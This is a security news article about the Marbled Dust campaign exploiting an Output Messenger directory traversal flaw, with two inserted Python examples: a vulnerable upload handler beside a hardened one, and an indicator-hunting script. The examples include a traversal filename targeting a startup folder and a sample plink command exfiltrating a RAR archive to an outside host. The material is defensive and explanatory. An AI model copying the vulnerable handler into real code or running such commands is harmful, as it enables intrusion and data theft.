Hackers Exploiting Output Messenger 0-Day Vulnerability to Deploy Malicious Payloads

May 13, 2025 - 09:54

Microsoft Threat Intelligence has identified a sophisticated cyber espionage campaign targeting Kurdish military entities in Iraq. The threat actor, known as Marbled Dust, has been exploiting a zero-day vulnerability in Output Messenger since April 2024 to collect sensitive user data and deploy malicious payloads across victim networks.

Output Messenger, a multiplatform chat application that organizations use for internal communications, contains a directory traversal vulnerability (CVE-2025-27920) that lets an authenticated user write uploaded files outside the intended upload location, including into the server's startup directory, from which they are launched automatically.
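The bug class behind CVE-2025-27920, shown as an added illustration rather than Output Messenger's own code: an upload handler that joins a client-supplied filename onto its upload directory, beside a hardened version that rejects anything other than a bare filename and then confirms the resolved path is still inside the upload directory. The directory names ("uploads", "startup") are hypothetical stand-ins for the product's real layout.

```python
import os
import tempfile

# Added illustration of the bug class the article describes: a file-upload
# handler that trusts a client-supplied filename. Directory names are
# hypothetical and are not Output Messenger's real layout.

def make_server_root() -> str:
    """Create a throwaway tree with an 'uploads' dir and a 'startup' dir."""
    root = tempfile.mkdtemp(prefix="om_demo_")
    os.makedirs(os.path.join(root, "uploads"))
    os.makedirs(os.path.join(root, "startup"))
    return os.path.realpath(root)

def save_upload_vulnerable(root: str, filename: str, data: bytes) -> str:
    """Vulnerable: joins the raw name onto the upload dir, so '..' segments
    walk out of it and an authenticated user can write anywhere the
    service account can, including a startup folder."""
    dest = os.path.join(root, "uploads", filename)
    with open(dest, "wb") as fh:
        fh.write(data)
    return os.path.realpath(dest)

def save_upload_safe(root: str, filename: str, data: bytes) -> str:
    """Hardened: reject any name that is not a single path component, then
    confirm the resolved destination is still inside the upload dir."""
    upload_dir = os.path.realpath(os.path.join(root, "uploads"))
    # Normalise Windows separators so '..\\startup\\x.vbs' is caught as well.
    candidate = filename.replace("\\", "/")
    if candidate in ("", ".", "..") or os.path.basename(candidate) != candidate:
        raise ValueError("filename must be a bare name: %r" % filename)
    dest = os.path.realpath(os.path.join(upload_dir, candidate))
    # Defence in depth: catches symlink or normalisation tricks that survive the name check.
    if os.path.commonpath([upload_dir, dest]) != upload_dir:
        raise ValueError("destination escapes upload dir: %r" % dest)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest

def demo() -> dict:
    """Run both handlers against a traversal name and a benign name."""
    root = make_server_root()
    startup_dir = os.path.join(root, "startup")
    # Only the shape of the name is taken from the article; the payload is a comment line.
    traversal = "../startup/OMServerService.vbs"
    written = save_upload_vulnerable(root, traversal, b"' dropper placeholder\r\n")
    try:
        save_upload_safe(root, traversal, b"x")
        blocked = False
    except ValueError:
        blocked = True
    benign = save_upload_safe(root, "notes.txt", b"hello")
    return {
        "vulnerable_wrote_to_startup": os.path.dirname(written) == startup_dir,
        "safe_blocked_traversal": blocked,
        "safe_kept_in_uploads": os.path.dirname(benign) == os.path.join(root, "uploads"),
    }

if __name__ == "__main__":
    print(demo())
```

The name check alone already stops the traversal; the `commonpath` check is kept because real servers resolve symlinks and apply their own normalisation, and a single bare-name test is easy to regress in later refactors.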

Upon discovering this vulnerability, Microsoft notified Srimax, the developer of Output Messenger, who promptly released patches to address the issue.

According to Microsoft's researchers, Marbled Dust has been specifically targeting users associated with Kurdish military operations in Iraq. This is consistent with the group's historical targeting, which has focused on entities whose interests run counter to those of the Turkish government.

Output Messenger 0-Day Vulnerability

“The successful use of a zero-day exploit suggests an increase in technical sophistication and could indicate that Marbled Dust’s targeting priorities have escalated or that their operational goals have become more urgent,” Microsoft stated in their recent security blog.

Microsoft assesses that Marbled Dust conducts reconnaissance to identify whether potential targets use Output Messenger before launching their attacks.

While the exact method of obtaining initial authentication credentials remains unclear, researchers believe the group leverages DNS hijacking or typo-squatted domains to intercept and reuse legitimate credentials.

The attack chain begins once Marbled Dust has authenticated access to the Output Messenger Server Manager. The group exploits the directory traversal vulnerability to drop OMServerService.vbs and OM.vbs into the server's startup folder and OMServerService.exe into the Users/public/videos directory.

The scripts launch OMServerService.exe, a GoLang backdoor that connects to a command-and-control domain (api.wordinfos[.]com) for further instructions and data exfiltration.

On client machines, another backdoor called OMClientService.exe is installed alongside the legitimate Output Messenger application. This malware communicates with the same command-and-control infrastructure, sending identifying information about the victim and executing commands received from the attackers.

In at least one observed case, the attackers used the command-line version of PuTTY (plink) to exfiltrate data collected in RAR archives.
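The indicators above (the dropped file names, their drop locations, the C2 domain and the plink-plus-RAR exfiltration) can be turned into a simple host triage. The Python below is an added example, not Microsoft's published hunting guidance: it checks a constructed file inventory, constructed DNS log lines and constructed process command lines against those indicators. The log line formats, the "plink with a .rar on the command line" heuristic and the sample data are assumptions made for the illustration.

```python
import re
from typing import Dict, List, Optional

# Indicators quoted from the article: dropped file names, their drop locations
# and the C2 domain (refanged here so it can be matched). The rules, the
# sample inventory, DNS lines and command lines are constructed for this
# illustration and are not Microsoft's detection guidance.
C2_DOMAIN = "api.wordinfos.com"
STARTUP_SUFFIX = "\\start menu\\programs\\startup"
PUBLIC_VIDEOS_SUFFIX = "\\users\\public\\videos"

def check_file(path: str) -> Optional[str]:
    """Return a finding if the path matches a dropped-file indicator, else None."""
    norm = path.replace("/", "\\").lower()
    folder, _, name = norm.rpartition("\\")
    if name in ("omserverservice.vbs", "om.vbs") and folder.endswith(STARTUP_SUFFIX):
        return "server dropper in Startup folder: " + path
    if name == "omserverservice.exe" and folder.endswith(PUBLIC_VIDEOS_SUFFIX):
        return "GoLang backdoor staged in Users\\Public\\Videos: " + path
    if name == "omclientservice.exe":
        # Name-only match: confirm it sits beside the legitimate client before escalating.
        return "possible client backdoor (name match only): " + path
    return None

def check_dns(line: str) -> Optional[str]:
    """Flag a query for the C2 domain or any subdomain of it.
    Assumed log shape: '<timestamp> <host> query <qname>' (constructed)."""
    parts = line.split()
    if not parts:
        return None
    qname = parts[-1].lower().rstrip(".")
    if qname == C2_DOMAIN or qname.endswith("." + C2_DOMAIN):
        return "query for Marbled Dust C2 domain: " + line
    return None

def check_process(cmdline: str) -> Optional[str]:
    """Heuristic (assumption): plink invoked with a .rar archive on the command line."""
    low = cmdline.lower()
    if "plink" in low and re.search(r"\.rar\b", low):
        return "plink moving a RAR archive (possible exfiltration): " + cmdline
    return None

def run_hunt(files: List[str], dns_lines: List[str], cmdlines: List[str]) -> Dict[str, List[str]]:
    """Apply all three checks and return the findings grouped by source."""
    return {
        "files": [f for f in map(check_file, files) if f],
        "dns": [f for f in map(check_dns, dns_lines) if f],
        "procs": [f for f in map(check_process, cmdlines) if f],
    }

# Constructed sample telemetry (not real data from any victim host).
SAMPLE_FILES = [
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OMServerService.vbs",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OM.vbs",
    r"C:\Users\Public\Videos\OMServerService.exe",
    r"C:\Program Files\Output Messenger\OMClientService.exe",
    r"C:\Users\alice\Downloads\OM.vbs",          # same name, wrong location: not flagged
    r"C:\Windows\System32\notepad.exe",
]
SAMPLE_DNS = [
    "2025-04-03T08:12:01Z ws-17 query api.wordinfos.com",
    "2025-04-03T08:12:03Z ws-17 query www.microsoft.com",
    "2025-04-03T08:13:09Z ws-22 query API.WORDINFOS.COM.",
]
SAMPLE_CMDLINES = [
    r'"C:\Users\Public\plink.exe" -ssh user@203.0.113.5 -pw ****** "cat > in.rar" < C:\Users\Public\Videos\c.rar',
    r"C:\Windows\System32\svchost.exe -k netsvcs -p",
]

def demo() -> Dict[str, List[str]]:
    return run_hunt(SAMPLE_FILES, SAMPLE_DNS, SAMPLE_CMDLINES)

if __name__ == "__main__":
    for source, findings in demo().items():
        for f in findings:
            print(source, "|", f)
```

The file rules are deliberately tied to the locations the article names so that a copy of OM.vbs in a user's Downloads folder is not reported; the OMClientService.exe rule has no location to anchor on and is reported at lower confidence for that reason.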

“Once Marbled Dust gains access to the Output Messenger server, they can leverage the system architecture to gain indiscriminate access to the communications of every user, steal sensitive data, and impersonate users,” explained a Microsoft security researcher.

Microsoft has identified Marbled Dust as a Türkiye-affiliated espionage group that overlaps with activity tracked by other security vendors as Sea Turtle and UNC1326.

The group primarily targets entities in Europe and the Middle East, focusing on government institutions, telecommunications, and information technology sectors.

To mitigate the threat, Microsoft recommends updating Output Messenger to version 2.0.63 for Windows clients and version 2.0.62 for servers.

Additionally, organizations should enable cloud-delivered protection in their antivirus products, implement phishing-resistant authentication for critical applications, and deploy Microsoft Defender Vulnerability Management to identify vulnerabilities across their environment.

Microsoft continues to monitor this evolving threat and has released detailed detection guidance to help security teams identify potential compromises.


The post Hackers Exploiting Output Messenger 0-Day Vulnerability to Deploy Malicious Payloads appeared first on Cyber Security News.